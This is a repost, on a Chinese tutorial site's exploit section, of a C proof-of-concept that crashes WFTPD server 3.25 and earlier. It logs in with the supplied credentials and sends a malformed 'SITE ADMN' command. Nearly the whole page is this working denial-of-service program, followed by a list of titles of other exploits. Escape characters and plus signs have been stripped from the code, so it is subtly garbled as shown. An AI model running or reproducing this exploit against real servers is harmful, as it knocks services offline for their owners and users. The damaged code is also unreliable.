手机
当前位置:查字典教程网 >网络安全 >Exploit >WFTPD Pro Server
WFTPD Pro Server
摘要:/*********************************************************************...

/************************************************************************

*WFTPD server <= 3.25 SITE ADMN DoS *

* *

*Sending command SITE ADMN 32 makes server BOOM *

* *

*usage: wftpd_dos.exe ip port user pass *

* *

*Coded by Marsu <Marsupilamipowa@hotmail.fr> *

************************************************************************/ #include "winsock2.h"

#include "stdio.h"

#include "stdlib.h"

#pragma comment(lib, "ws2_32.lib") int main(int argc, char* argv[])

{

struct hostent *he;

struct sockaddr_in sock_addr;

WSADATA wsa;

int ftpsock;

char recvbuff[1024];

char evilbuff[100];

int buflen=100; if (argc!=5)

{

printf("[ ] Usage: %s <ip> <port> <user> <pass>n",argv[0]);

return 1;

}

WSACleanup();

WSAStartup(MAKEWORD(2,0),&wsa); printf("[ ] Connecting to %s:%s ... ",argv[1],argv[2]);

if ((he=gethostbyname(argv[1])) == NULL) {

printf("Failedn[-] Could not init gethostbynamen");

return 1;

}

if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {

printf("Failedn[-] Socket errorn");

return 1;

} sock_addr.sin_family = PF_INET;

sock_addr.sin_port = htons(atoi(argv[2]));

sock_addr.sin_addr = *((struct in_addr *)he->h_addr);

memset(&(sock_addr.sin_zero), '', 8);

if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {

printf("Failedn[-] Sorry, cannot connect to %s:%s. Error: %in", argv[1],argv[2],WSAGetLastError());

return 1;

}

printf("OKn");

memset(recvbuff,'',1024);

recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);

memcpy(evilbuff,"USER ",5);

memcpy(evilbuff 5,argv[3],strlen(argv[3]));

memcpy(evilbuff 5 strlen(argv[3]),"rn",3);

printf("[ ] Sending USER ... ");

if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {

printf("Failedn[-] Could not sendn");

return 1;

}

printf("OKn");

memset(recvbuff,'',1024);

recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);

memcpy(evilbuff,"PASS ",5);

memcpy(evilbuff 5,argv[4],strlen(argv[4]));

memcpy(evilbuff 5 strlen(argv[4]),"rn",3); printf("[ ] Sending PASS ... ");

if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {

printf("Failedn[-] Could not sendn");

return 1;

}

printf("OKn");

recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);

memcpy(evilbuff,"SITE ADMN ",10);

memset(evilbuff 10,32,1); //this char is powerfull :p

memcpy(evilbuff 10 1,"rn",3); printf("[ ] Sending SITE ADMN ... ");

if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {

printf("Failedn[-] Could not sendn");

return 1;

}

printf("OKn"); printf("[ ] Host should be downn");

return 0;

}

//http://www.leftworld.net

【WFTPD Pro Server】相关文章:

Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)

DESlock

Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

Dana IRC 1.4a Remote Buffer Overflow Exploit

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

精品推荐
分类导航